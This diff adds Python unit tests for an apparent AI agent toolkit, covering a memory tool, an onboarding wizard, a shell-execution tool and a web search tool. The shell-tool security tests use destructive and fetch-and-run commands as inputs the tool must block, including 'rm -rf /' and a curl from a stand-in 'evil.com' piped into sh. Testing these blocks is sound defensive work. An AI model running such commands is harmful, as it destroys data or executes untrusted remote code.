class TestMemoryToolValidation:
|
||||||
|
"""参数验证测试."""
|
||||||
|
|
||||||
|
async def test_invalid_file_key(self, tool: MemoryTool):
|
||||||
|
result = await tool.execute(action="read", file="invalid")
|
||||||
|
assert result["success"] is False
|
||||||
|
assert "Invalid" in result.get("error", "")
|
||||||
|
|
||||||
|
async def test_invalid_action(self, tool: MemoryTool):
|
||||||
|
result = await tool.execute(action="delete_everything", file="memory")
|
||||||
|
assert result["success"] is False
|
||||||
|
assert "Unknown action" in result.get("error", "")
|
||||||
|
|
||||||
|
async def test_add_respects_capacity(self, tool: MemoryTool, store: MemoryStore):
|
||||||
|
# memory file has MEMORY_BUDGET=2200
|
||||||
|
long_content = "A" * 3000
|
||||||
|
result = await tool.execute(action="add", file="memory", section="测试", content=long_content)
|
||||||
|
assert result["success"] is True
|
||||||
|
content = store.get_file("memory").read()
|
||||||
|
assert len(content) <= 2200
|
||||||
|
|
@ -0,0 +1,216 @@
|
||||||
|
"""Tests for onboarding wizard and chat command."""
|
||||||
|
|
||||||
|
from pathlib import Path
|
||||||
|
from unittest.mock import patch
|
||||||
|
|
||||||
|
import yaml
|
||||||
|
|
||||||
|
from agentkit.cli.onboarding import (
|
||||||
|
PROVIDER_PRESETS,
|
||||||
|
needs_onboarding,
|
||||||
|
run_onboarding,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
class TestNeedsOnboarding:
|
||||||
|
def test_needs_onboarding_when_no_config(self, tmp_path, monkeypatch):
|
||||||
|
"""Should return True when no config file exists."""
|
||||||
|
monkeypatch.chdir(tmp_path)
|
||||||
|
monkeypatch.delenv("AGENTKIT_CONFIG_PATH", raising=False)
|
||||||
|
assert needs_onboarding() is True
|
||||||
|
|
||||||
|
def test_no_onboarding_when_config_exists(self, tmp_path, monkeypatch):
|
||||||
|
"""Should return False when agentkit.yaml exists."""
|
||||||
|
config_file = tmp_path / "agentkit.yaml"
|
||||||
|
config_file.write_text("server:\n port: 8001\n")
|
||||||
|
monkeypatch.chdir(tmp_path)
|
||||||
|
assert needs_onboarding(config_arg=str(config_file)) is False
|
||||||
|
|
||||||
|
def test_no_onboarding_with_home_config(self, tmp_path, monkeypatch):
|
||||||
|
"""Should return False when ~/.agentkit/agentkit.yaml exists."""
|
||||||
|
home_dir = tmp_path / "home"
|
||||||
|
home_dir.mkdir()
|
||||||
|
agentkit_dir = home_dir / ".agentkit"
|
||||||
|
agentkit_dir.mkdir()
|
||||||
|
(agentkit_dir / "agentkit.yaml").write_text("server:\n port: 8001\n")
|
||||||
|
monkeypatch.setenv("HOME", str(home_dir))
|
||||||
|
monkeypatch.chdir(tmp_path / "empty" if (tmp_path / "empty").exists() else tmp_path)
|
||||||
|
# Create empty cwd to ensure no local config
|
||||||
|
empty_dir = tmp_path / "empty"
|
||||||
|
empty_dir.mkdir()
|
||||||
|
monkeypatch.chdir(empty_dir)
|
||||||
|
assert needs_onboarding() is False
|
||||||
|
|
||||||
|
|
||||||
|
class TestProviderPresets:
|
||||||
|
def test_all_presets_have_required_fields(self):
|
||||||
|
"""Every provider preset must have name, env_key, base_url, models."""
|
||||||
|
for key, preset in PROVIDER_PRESETS.items():
|
||||||
|
assert "name" in preset, f"{key} missing name"
|
||||||
|
assert "env_key" in preset, f"{key} missing env_key"
|
||||||
|
assert "base_url" in preset, f"{key} missing base_url"
|
||||||
|
assert "models" in preset, f"{key} missing models"
|
||||||
|
assert preset["models"], f"{key} has empty models"
|
||||||
|
assert "default_model" in preset, f"{key} missing default_model"
|
||||||
|
|
||||||
|
def test_preset_keys_are_lowercase(self):
|
||||||
|
"""Provider keys should be lowercase."""
|
||||||
|
for key in PROVIDER_PRESETS:
|
||||||
|
assert key == key.lower(), f"Provider key '{key}' should be lowercase"
|
||||||
|
|
||||||
|
def test_deepseek_preset(self):
|
||||||
|
"""DeepSeek preset should have correct configuration."""
|
||||||
|
ds = PROVIDER_PRESETS["deepseek"]
|
||||||
|
assert ds["env_key"] == "DEEPSEEK_API_KEY"
|
||||||
|
assert "deepseek-chat" in ds["models"]
|
||||||
|
assert ds["type"] == "openai"
|
||||||
|
|
||||||
|
def test_qwen_preset(self):
|
||||||
|
"""Qwen preset should use DashScope endpoint."""
|
||||||
|
qwen = PROVIDER_PRESETS["qwen"]
|
||||||
|
assert "dashscope" in qwen["base_url"]
|
||||||
|
assert qwen["env_key"] == "DASHSCOPE_API_KEY"
|
||||||
|
|
||||||
|
|
||||||
|
class TestRunOnboarding:
|
||||||
|
def test_onboarding_generates_config_files(self, tmp_path, monkeypatch):
|
||||||
|
"""Onboarding should generate agentkit.yaml and .env."""
|
||||||
|
monkeypatch.chdir(tmp_path)
|
||||||
|
monkeypatch.setenv("HOME", str(tmp_path / "home"))
|
||||||
|
(tmp_path / "home").mkdir(exist_ok=True)
|
||||||
|
|
||||||
|
# Mock user input
|
||||||
|
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
|
||||||
|
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
|
||||||
|
# Step 1: Select DeepSeek (option 1)
|
||||||
|
# Step 2: API key
|
||||||
|
# Step 2b: Select model (1 = deepseek-chat, default)
|
||||||
|
# Step 5: Agent personality (name, personality, speaking_style)
|
||||||
|
mock_prompt.ask.side_effect = ["1", "sk-test-deepseek-key", "1", "小王", "友好耐心", "简洁专业"]
|
||||||
|
# Step 3: No second provider
|
||||||
|
mock_confirm.ask.return_value = False
|
||||||
|
|
||||||
|
config_path = run_onboarding(output_dir=str(tmp_path))
|
||||||
|
|
||||||
|
assert config_path is not None
|
||||||
|
assert Path(config_path).exists()
|
||||||
|
|
||||||
|
# Verify agentkit.yaml content
|
||||||
|
with open(config_path) as f:
|
||||||
|
config = yaml.safe_load(f)
|
||||||
|
assert "llm" in config
|
||||||
|
assert "deepseek" in config["llm"]["providers"]
|
||||||
|
assert config["llm"]["providers"]["deepseek"]["base_url"] == "https://api.deepseek.com/v1"
|
||||||
|
|
||||||
|
# Verify .env content
|
||||||
|
env_path = tmp_path / ".env"
|
||||||
|
assert env_path.exists()
|
||||||
|
env_content = env_path.read_text()
|
||||||
|
assert "DEEPSEEK_API_KEY=sk-test-deepseek-key" in env_content
|
||||||
|
|
||||||
|
def test_onboarding_with_two_providers(self, tmp_path, monkeypatch):
|
||||||
|
"""Onboarding should support adding a second provider."""
|
||||||
|
monkeypatch.chdir(tmp_path)
|
||||||
|
monkeypatch.setenv("HOME", str(tmp_path / "home"))
|
||||||
|
(tmp_path / "home").mkdir(exist_ok=True)
|
||||||
|
|
||||||
|
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
|
||||||
|
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
|
||||||
|
# Select DeepSeek (1), API key, model (1), then Qwen as second
|
||||||
|
# After removing deepseek, remaining = [openai, bailian-coding, qwen, doubao, gemini, anthropic]
|
||||||
|
# qwen is at index 2, so option 3
|
||||||
|
# Step 5: Agent personality defaults
|
||||||
|
mock_prompt.ask.side_effect = ["1", "sk-deepseek", "1", "3", "sk-dashscope", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
|
||||||
|
mock_confirm.ask.return_value = True
|
||||||
|
|
||||||
|
config_path = run_onboarding(output_dir=str(tmp_path))
|
||||||
|
|
||||||
|
with open(config_path) as f:
|
||||||
|
config = yaml.safe_load(f)
|
||||||
|
|
||||||
|
providers = config["llm"]["providers"]
|
||||||
|
assert "deepseek" in providers
|
||||||
|
assert "qwen" in providers
|
||||||
|
|
||||||
|
env_path = tmp_path / ".env"
|
||||||
|
env_content = env_path.read_text()
|
||||||
|
assert "DEEPSEEK_API_KEY=sk-deepseek" in env_content
|
||||||
|
assert "DASHSCOPE_API_KEY=sk-dashscope" in env_content
|
||||||
|
|
||||||
|
def test_onboarding_cancelled_on_empty_api_key(self, tmp_path, monkeypatch):
|
||||||
|
"""Onboarding should return None if API key is empty."""
|
||||||
|
monkeypatch.chdir(tmp_path)
|
||||||
|
|
||||||
|
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt:
|
||||||
|
mock_prompt.ask.side_effect = ["1", ""] # Empty API key
|
||||||
|
|
||||||
|
result = run_onboarding(output_dir=str(tmp_path))
|
||||||
|
|
||||||
|
assert result is None
|
||||||
|
|
||||||
|
def test_onboarding_config_has_memory_backend(self, tmp_path, monkeypatch):
|
||||||
|
"""Generated config should use memory backends by default."""
|
||||||
|
monkeypatch.chdir(tmp_path)
|
||||||
|
monkeypatch.setenv("HOME", str(tmp_path / "home"))
|
||||||
|
(tmp_path / "home").mkdir(exist_ok=True)
|
||||||
|
|
||||||
|
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
|
||||||
|
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
|
||||||
|
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
|
||||||
|
mock_confirm.ask.return_value = False
|
||||||
|
|
||||||
|
config_path = run_onboarding(output_dir=str(tmp_path))
|
||||||
|
|
||||||
|
with open(config_path) as f:
|
||||||
|
config = yaml.safe_load(f)
|
||||||
|
|
||||||
|
assert config["session"]["backend"] == "memory"
|
||||||
|
assert config["bus"]["backend"] == "memory"
|
||||||
|
assert config["task_store"]["backend"] == "memory"
|
||||||
|
|
||||||
|
|
||||||
|
class TestOnboardingSoulGeneration:
|
||||||
|
"""U5: Onboarding 生成 SOUL.md 测试."""
|
||||||
|
|
||||||
|
def test_onboarding_creates_soul_md(self, tmp_path, monkeypatch):
|
||||||
|
"""Onboarding should create SOUL.md with custom agent name."""
|
||||||
|
monkeypatch.chdir(tmp_path)
|
||||||
|
home_dir = tmp_path / "home"
|
||||||
|
home_dir.mkdir(exist_ok=True)
|
||||||
|
monkeypatch.setenv("HOME", str(home_dir))
|
||||||
|
|
||||||
|
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
|
||||||
|
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
|
||||||
|
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "小王", "友好耐心", "简洁专业"]
|
||||||
|
mock_confirm.ask.return_value = False
|
||||||
|
|
||||||
|
run_onboarding(output_dir=str(tmp_path))
|
||||||
|
|
||||||
|
# Verify SOUL.md was created
|
||||||
|
soul_path = home_dir / ".agentkit" / "SOUL.md"
|
||||||
|
assert soul_path.exists()
|
||||||
|
soul_content = soul_path.read_text(encoding="utf-8")
|
||||||
|
assert "小王" in soul_content
|
||||||
|
assert "友好耐心" in soul_content
|
||||||
|
assert "简洁专业" in soul_content
|
||||||
|
|
||||||
|
def test_onboarding_soul_with_defaults(self, tmp_path, monkeypatch):
|
||||||
|
"""Onboarding with default personality should create default SOUL.md."""
|
||||||
|
monkeypatch.chdir(tmp_path)
|
||||||
|
home_dir = tmp_path / "home"
|
||||||
|
home_dir.mkdir(exist_ok=True)
|
||||||
|
monkeypatch.setenv("HOME", str(home_dir))
|
||||||
|
|
||||||
|
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
|
||||||
|
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
|
||||||
|
# Prompt.ask returns the default value when user presses Enter
|
||||||
|
# Our mock needs to return the actual default values
|
||||||
|
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
|
||||||
|
mock_confirm.ask.return_value = False
|
||||||
|
|
||||||
|
run_onboarding(output_dir=str(tmp_path))
|
||||||
|
|
||||||
|
soul_path = home_dir / ".agentkit" / "SOUL.md"
|
||||||
|
assert soul_path.exists()
|
||||||
|
soul_content = soul_path.read_text(encoding="utf-8")
|
||||||
|
assert "AgentKit" in soul_content
|
||||||
|
|
@ -0,0 +1,155 @@
|
||||||
|
"""Unit tests for ShellTool — command execution with safety controls."""
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from agentkit.tools.shell import ShellTool, DEFAULT_ALLOWED_COMMANDS, BLOCKED_PATTERNS
|
||||||
|
|
||||||
|
|
||||||
|
class TestShellToolSchema:
|
||||||
|
"""Test schema definitions."""
|
||||||
|
|
||||||
|
def test_input_schema_has_required_fields(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
schema = tool.input_schema
|
||||||
|
assert "command" in schema["properties"]
|
||||||
|
assert "command" in schema["required"]
|
||||||
|
assert "timeout" in schema["properties"]
|
||||||
|
assert "working_dir" in schema["properties"]
|
||||||
|
|
||||||
|
def test_output_schema_has_required_fields(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
schema = tool.output_schema
|
||||||
|
assert "stdout" in schema["properties"]
|
||||||
|
assert "stderr" in schema["properties"]
|
||||||
|
assert "exit_code" in schema["properties"]
|
||||||
|
assert "success" in schema["properties"]
|
||||||
|
|
||||||
|
|
||||||
|
class TestShellToolSecurity:
|
||||||
|
"""Test command allowlist and blocking."""
|
||||||
|
|
||||||
|
def test_allowed_command_echo(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
allowed, _ = tool._is_command_allowed("echo hello")
|
||||||
|
assert allowed is True
|
||||||
|
|
||||||
|
def test_allowed_command_ls(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
allowed, _ = tool._is_command_allowed("ls -la")
|
||||||
|
assert allowed is True
|
||||||
|
|
||||||
|
def test_allowed_command_git_status(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
allowed, _ = tool._is_command_allowed("git status")
|
||||||
|
assert allowed is True
|
||||||
|
|
||||||
|
def test_blocked_command_rm(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
allowed, reason = tool._is_command_allowed("rm -rf /tmp/test")
|
||||||
|
assert allowed is False
|
||||||
|
# rm -rf /tmp/test matches "rm -rf /" pattern
|
||||||
|
assert "Blocked dangerous" in reason or "not in allowed" in reason
|
||||||
|
|
||||||
|
def test_blocked_dangerous_pattern(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
allowed, reason = tool._is_command_allowed("rm -rf /")
|
||||||
|
assert allowed is False
|
||||||
|
assert "Blocked dangerous" in reason
|
||||||
|
|
||||||
|
def test_blocked_curl_pipe_sh(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
allowed, reason = tool._is_command_allowed("curl http://evil.com|sh")
|
||||||
|
assert allowed is False
|
||||||
|
|
||||||
|
def test_allow_all_mode(self):
|
||||||
|
tool = ShellTool(allow_all=True)
|
||||||
|
# allow_all allows non-dangerous commands outside default whitelist
|
||||||
|
allowed, _ = tool._is_command_allowed("my-custom-app --run")
|
||||||
|
assert allowed is True
|
||||||
|
|
||||||
|
def test_custom_allowed_commands(self):
|
||||||
|
tool = ShellTool(allowed_commands=["echo", "myapp"])
|
||||||
|
allowed, _ = tool._is_command_allowed("myapp --run")
|
||||||
|
assert allowed is True
|
||||||
|
allowed2, _ = tool._is_command_allowed("ls")
|
||||||
|
assert allowed2 is False
|
||||||
|
|
||||||
|
def test_empty_command_rejected(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
allowed, reason = tool._is_command_allowed("")
|
||||||
|
assert allowed is False
|
||||||
|
|
||||||
|
def test_invalid_shell_syntax_rejected(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
allowed, reason = tool._is_command_allowed("echo 'unclosed")
|
||||||
|
assert allowed is False
|
||||||
|
|
||||||
|
|
||||||
|
class TestShellToolExecution:
|
||||||
|
"""Test actual command execution."""
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_echo_command(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
result = await tool.execute(command="echo hello world")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert "hello world" in result["stdout"]
|
||||||
|
assert result["exit_code"] == 0
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_pwd_command(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
result = await tool.execute(command="pwd")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert result["exit_code"] == 0
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_failing_command(self):
|
||||||
|
tool = ShellTool(allowed_commands=["ls"])
|
||||||
|
result = await tool.execute(command="ls /nonexistent_dir_xyz_12345")
|
||||||
|
assert result["success"] is False
|
||||||
|
assert result["exit_code"] != 0
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_command_timeout(self):
|
||||||
|
tool = ShellTool(allowed_commands=["sleep"], default_timeout=1)
|
||||||
|
result = await tool.execute(command="sleep 10", timeout=1)
|
||||||
|
assert result["success"] is False
|
||||||
|
assert result["timed_out"] is True
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_missing_command_param(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
result = await tool.execute()
|
||||||
|
assert result["success"] is False
|
||||||
|
assert "command" in result["error"]
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_blocked_command_returns_error(self):
|
||||||
|
tool = ShellTool()
|
||||||
|
result = await tool.execute(command="rm -rf /tmp/test")
|
||||||
|
assert result["success"] is False
|
||||||
|
assert "not allowed" in result["error"]
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_working_dir(self):
|
||||||
|
tool = ShellTool(working_dir="/tmp")
|
||||||
|
result = await tool.execute(command="pwd")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert "/tmp" in result["stdout"]
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_output_truncation(self):
|
||||||
|
tool = ShellTool(max_output_length=50, allowed_commands=["python3"])
|
||||||
|
# Generate long output
|
||||||
|
result = await tool.execute(command="python3 -c \"print('x' * 1000)\"")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert len(result["stdout"]) < 200 # Truncated + message
|
||||||
|
assert "truncated" in result.get("stdout", "") or result.get("truncated") is True
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_stderr_captured(self):
|
||||||
|
tool = ShellTool(allowed_commands=["python3"])
|
||||||
|
result = await tool.execute(command="python3 -c \"import sys; print('error', file=sys.stderr)\"")
|
||||||
|
assert "error" in result["stderr"]
|
||||||
|
|
@ -0,0 +1,172 @@
|
||||||
|
"""Unit tests for WebSearchTool — multi-backend web search."""
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
from unittest.mock import AsyncMock, patch, MagicMock
|
||||||
|
|
||||||
|
from agentkit.tools.web_search import WebSearchTool
|
||||||
|
|
||||||
|
|
||||||
|
class TestWebSearchToolSchema:
|
||||||
|
"""Test schema definitions."""
|
||||||
|
|
||||||
|
def test_input_schema_has_required_fields(self):
|
||||||
|
tool = WebSearchTool()
|
||||||
|
schema = tool.input_schema
|
||||||
|
assert "query" in schema["properties"]
|
||||||
|
assert "query" in schema["required"]
|
||||||
|
assert "max_results" in schema["properties"]
|
||||||
|
|
||||||
|
def test_output_schema_has_required_fields(self):
|
||||||
|
tool = WebSearchTool()
|
||||||
|
schema = tool.output_schema
|
||||||
|
assert "results" in schema["properties"]
|
||||||
|
assert "total" in schema["properties"]
|
||||||
|
"backend" in schema["properties"]
|
||||||
|
assert "success" in schema["properties"]
|
||||||
|
|
||||||
|
|
||||||
|
class TestWebSearchToolValidation:
|
||||||
|
"""Test input validation."""
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_missing_query(self):
|
||||||
|
tool = WebSearchTool()
|
||||||
|
result = await tool.execute()
|
||||||
|
assert result["success"] is False
|
||||||
|
assert "query" in result["error"]
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_empty_query(self):
|
||||||
|
tool = WebSearchTool()
|
||||||
|
result = await tool.execute(query="")
|
||||||
|
assert result["success"] is False
|
||||||
|
|
||||||
|
|
||||||
|
class TestWebSearchToolDuckDuckGo:
|
||||||
|
"""Test DuckDuckGo fallback parsing."""
|
||||||
|
|
||||||
|
def test_parse_html_with_results(self):
|
||||||
|
html = """
|
||||||
|
<html><body>
|
||||||
|
<a class="result-link" href="https://example.com/result1">Result 1 Title</a>
|
||||||
|
<td class="result-snippet">Snippet for result 1</td>
|
||||||
|
<a class="result-link" href="https://example.com/result2">Result 2 Title</a>
|
||||||
|
<td class="result-snippet">Snippet for result 2</td>
|
||||||
|
</body></html>
|
||||||
|
"""
|
||||||
|
results = WebSearchTool._parse_duckduckgo_html(html, 5)
|
||||||
|
assert len(results) == 2
|
||||||
|
assert results[0]["title"] == "Result 1 Title"
|
||||||
|
assert results[0]["url"] == "https://example.com/result1"
|
||||||
|
assert results[0]["snippet"] == "Snippet for result 1"
|
||||||
|
|
||||||
|
def test_parse_html_empty(self):
|
||||||
|
results = WebSearchTool._parse_duckduckgo_html("<html></html>", 5)
|
||||||
|
assert results == []
|
||||||
|
|
||||||
|
def test_parse_html_skips_duckduckgo_links(self):
|
||||||
|
html = """
|
||||||
|
<a class="result-link" href="https://duckduckgo.com/internal">Internal</a>
|
||||||
|
<a class="result-link" href="https://example.com/good">Good Result</a>
|
||||||
|
<td class="result-snippet">Good snippet</td>
|
||||||
|
"""
|
||||||
|
results = WebSearchTool._parse_duckduckgo_html(html, 5)
|
||||||
|
assert len(results) == 1
|
||||||
|
assert results[0]["url"] == "https://example.com/good"
|
||||||
|
|
||||||
|
def test_parse_html_max_results(self):
|
||||||
|
html = ""
|
||||||
|
for i in range(10):
|
||||||
|
html += f'<a class="result-link" href="https://example.com/{i}">Title {i}</a>\n'
|
||||||
|
html += f'<td class="result-snippet">Snippet {i}</td>\n'
|
||||||
|
results = WebSearchTool._parse_duckduckgo_html(html, 3)
|
||||||
|
assert len(results) == 3
|
||||||
|
|
||||||
|
|
||||||
|
class TestWebSearchToolTavily:
|
||||||
|
"""Test Tavily API backend."""
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_tavily_success(self):
|
||||||
|
tool = WebSearchTool(tavily_api_key="test-key")
|
||||||
|
|
||||||
|
mock_response = MagicMock()
|
||||||
|
mock_response.json.return_value = {
|
||||||
|
"results": [
|
||||||
|
{"title": "Test", "url": "https://example.com", "content": "Test content"},
|
||||||
|
]
|
||||||
|
}
|
||||||
|
mock_response.raise_for_status = MagicMock()
|
||||||
|
|
||||||
|
with patch("httpx.AsyncClient") as mock_client_cls:
|
||||||
|
mock_client = AsyncMock()
|
||||||
|
mock_client.post = AsyncMock(return_value=mock_response)
|
||||||
|
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||||
|
mock_client.__aexit__ = AsyncMock(return_value=None)
|
||||||
|
mock_client_cls.return_value = mock_client
|
||||||
|
|
||||||
|
result = await tool.execute(query="test query")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert result["backend"] == "tavily"
|
||||||
|
assert len(result["results"]) == 1
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_tavily_failure_falls_back(self):
|
||||||
|
tool = WebSearchTool(tavily_api_key="test-key")
|
||||||
|
|
||||||
|
with patch.object(tool, "_search_tavily", return_value={"success": False, "error": "API error", "results": [], "total": 0}):
|
||||||
|
with patch.object(tool, "_search_duckduckgo", return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True}):
|
||||||
|
result = await tool.execute(query="test")
|
||||||
|
assert result["backend"] == "duckduckgo"
|
||||||
|
|
||||||
|
|
||||||
|
class TestWebSearchToolSerper:
|
||||||
|
"""Test Serper API backend."""
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_serper_success(self):
|
||||||
|
tool = WebSearchTool(serper_api_key="test-key")
|
||||||
|
|
||||||
|
mock_response = MagicMock()
|
||||||
|
mock_response.json.return_value = {
|
||||||
|
"organic": [
|
||||||
|
{"title": "Test", "link": "https://example.com", "snippet": "Test snippet"},
|
||||||
|
]
|
||||||
|
}
|
||||||
|
mock_response.raise_for_status = MagicMock()
|
||||||
|
|
||||||
|
with patch("httpx.AsyncClient") as mock_client_cls:
|
||||||
|
mock_client = AsyncMock()
|
||||||
|
mock_client.post = AsyncMock(return_value=mock_response)
|
||||||
|
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||||
|
mock_client.__aexit__ = AsyncMock(return_value=None)
|
||||||
|
mock_client_cls.return_value = mock_client
|
||||||
|
|
||||||
|
result = await tool.execute(query="test query")
|
||||||
|
assert result["success"] is True
|
||||||
|
assert result["backend"] == "serper"
|
||||||
|
assert len(result["results"]) == 1
|
||||||
|
|
||||||
|
|
||||||
|
class TestWebSearchToolPriority:
|
||||||
|
"""Test backend priority and fallback chain."""
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_tavily_over_serper(self):
|
||||||
|
"""Tavily should be tried before Serper when both keys are available."""
|
||||||
|
tool = WebSearchTool(tavily_api_key="t-key", serper_api_key="s-key")
|
||||||
|
|
||||||
|
with patch.object(tool, "_search_tavily", return_value={"results": [], "total": 0, "backend": "tavily", "success": True}) as mock_tavily:
|
||||||
|
result = await tool.execute(query="test")
|
||||||
|
mock_tavily.assert_called_once()
|
||||||
|
assert result["backend"] == "tavily"
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_no_keys_uses_duckduckgo(self):
|
||||||
|
"""Without API keys, DuckDuckGo is used directly."""
|
||||||
|
tool = WebSearchTool()
|
||||||
|
|
||||||
|
with patch.object(tool, "_search_duckduckgo", return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True}) as mock_ddg:
|
||||||
|
result = await tool.execute(query="test")
|
||||||
|
mock_ddg.assert_called_once()
|
||||||
|
assert result["backend"] == "duckduckgo"
|
||||||
Loading…
Reference in New Issue